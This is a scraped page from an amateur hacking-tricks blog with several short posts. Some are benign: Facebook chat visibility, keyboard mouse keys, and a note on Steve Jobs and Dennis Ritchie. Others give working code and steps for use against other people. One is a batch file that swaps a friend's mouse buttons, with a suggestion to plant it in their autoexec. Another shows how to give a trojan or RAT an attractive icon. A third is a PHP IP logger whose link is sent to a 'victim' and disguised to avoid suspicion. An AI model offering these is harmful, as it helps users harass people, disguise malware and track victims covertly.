swap mouse button,make ur frndz mad!!

0 comments

 swap mouse button,make ur frndz mad!!
This will switch the left mouse button with your right mouse button. Jus copy this into a new notepad file and save it as anything.bat,again,,in place of anything u could write anything u want .
also maybe add a code to stick in ur friend's autoexec,
that would really ur friend mad!!




@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gonna screw you up
msg * good look finding how to fix it
msg * elso go 2 hell!!

Save as .bat

enjoy..........

Change the icon of a file(Res Hackr)

0 comments

If you have successfully created your server,trojan,rats sometimes you need to change the icon to something attractive,there is many way to do that like using the software icon changer.But here is a simple tutorial to change the icon of any file using Resource Hacker


1. Download and extract Resource Hacker. You can find Resource Hacker at their official site here -

http://www.angusj.com/resourcehacker/

2. Open Resource Hacker (ResHacker.exe)

It should look like this:









3. Click File - Open




4. Browse and find the file that you want the icon changed on. Click on it, then select Open. For my tutorial, I will be using server.exe





5. Now click Action - Replace Icon...



6. Click Open file with new icon...





7. Browse for the Icon File or Exe File that you would like to set the new Icon as. Select the file and then click Open. For my tutorial, I will be using the Pandora Radio Icon.






8. Now click Replace




9. Finally click File - Save




10. Your file should now have the new icon you selected as shown below:





You have now successfully changed the icon of the file you wanted!

How to Appear Online to Some of Your Friends on Facebook Chat

0 comments

"Appearing offline to some of your friends on Facebook Chat" might happen in any case when you fought with him/her or you want to chat with one or two people only and do not want to be distracted by others messages. If you want to appear offline to those "NO TO CHAT" people in any case, then facebook has a nice feature which enables you to choose with whom you do not want to chat.

Well, if you are having a lot people in your friend list and would like to chat only with a few real friends and do not want to be distracted by others, this trick may help you in such a case.

Well, you might be aware of the offline/online feature that comes to be offline/online to everyone. So, let us go further.


Steps to Appear Offline to Some of your friends on Facebook:-


(1) Firstly Login into your Facebook Account.

(2) On the homepage, at the left side, Locate Lists and Click on More.






(3) On the next page, Click on Create a list button and give your list a desired name.





(4) You will be redirected to the next page where you will be asked to add friends.
Note: Add only those friends with whom you want to appear online to chat.
You will be able to add friends to the list from the right side of your page.



                                                   

 (5) When you are done by adding all your friends to the list with whom you want chat and appear online, Go back to your chat sidebar, and click on the settings button and then click on Limit Availability...



(6) Then SelectOnly make me available toand mark the group you just created and Click on OK. That's all.





This makes you appear online to only those friends to which you selected.

Use Mouse Pointer with Keyboard

0 comments

Use Mouse Pointer with Keyboard (Numberic Keypad)




Actually this is not a trick, This is Windows hidden feature.
But most newbies dont know abt it
This is best when u hav run in mouse shortage
I use this when my mouse cable is ate by mouse


1. Press and Hold your left hand side Alt + Shift
2. Press Num Lock (in your Numberic Keypad)
3. Press OK
4. Now you can use your mouse pointer with your key pad

4,2,6,8 = left,down,right,up respectvely
5 = click

That's what we call Luck

2 comments



Without Steve Jobs (February 24, 1955 – October 5, 2011) we would have:
No iProducts
No over expensive laptops

Without Dennis Ritchie (September 9, 1941 – October 12, 2011) we would have:
No Windows
No Unix
No C
No Programs
A large setback in computing
No Generic-text Languages.
We would all read in Binary..

They died in the same year and the same month but it seems only few notice the death of Dennis Ritchie compared to Steve Jobs.

Get IP address of the victim

0 comments

I know you most of the time search on Google, Yahoo, etc, for tutorial on tracking your victim's IP. Yes, you can find many positive response, and there are also many ways by which you can log IP, but all those methods are a little bit tough as compared to my one, I have found a fresh technique by which you can log your victim's IP easily. This method is far most the best way of logging IP which I used myself many times.



What we will need?
This method doesn't require any heavy program or any other means. It will require:


  • A Free and powerful hosting. I will recommend to use My3gb, or else your wish.
  • A Php script to log IP which I have provided below.
  • Some brain and a little bit HTML knowledge
How to Setup your IP logger?
After fulfilling all the required things, we will have to setup our IP logger so that it can log IPs. Create your account at any free hosting site, I use My3gb by myself, or you can also use any other hosting as per your choice. Open notepad and paste this script: 

<html>
<?php
$file = "log.txt";
$f=fopen($file, 'a');
fwrite($f,$_SERVER['REMOTE_ADDR']."\n\n"); 
fclose($f);
?>
//You can customize this part to make your page look attractive
</body>
</html>
Save this as Logger.php. Then you will have to create a text file with name log.txt.
After creating both these files, upload it to your website.

How to log IPs?
After uploading these files you will get a link, copy the link of your "Logger.php" file and send it to your victim by any means, but before doing this, test it for minimum two times on yourself. Now you can get the IP of your victim as soon as he open that link and the IPs will be logged in your "log.txt".

Customize the Logger.php file
This is very important step because as soon as your victim's visit your IP logging page then if he will find nothing or some suspicious thing then he will came to know that there is something wrong. For securing yourself from this suspicion you will have to customize your file, its easy if you have a little bit knowledge of HTML. Using HTML, you can simply made a small beautiful page for your victim.

Cross Site Scripting (XSS)

0 comments

                                                               

 Cross-Site Scripting is a type of attack in which a hacker inject script into webpages. Their effect may range from a pretty nuisance to a significant security risk. By this way of injecting codes into webpages, a hacker can gain access to sensitive page content, session cookies, and a variety of other information which are maintained by the  
                                                                                                        browser on behalf of the user.


http://www.youtube.com/watch?v=yzJG7GPuFyo&feature=player_embedded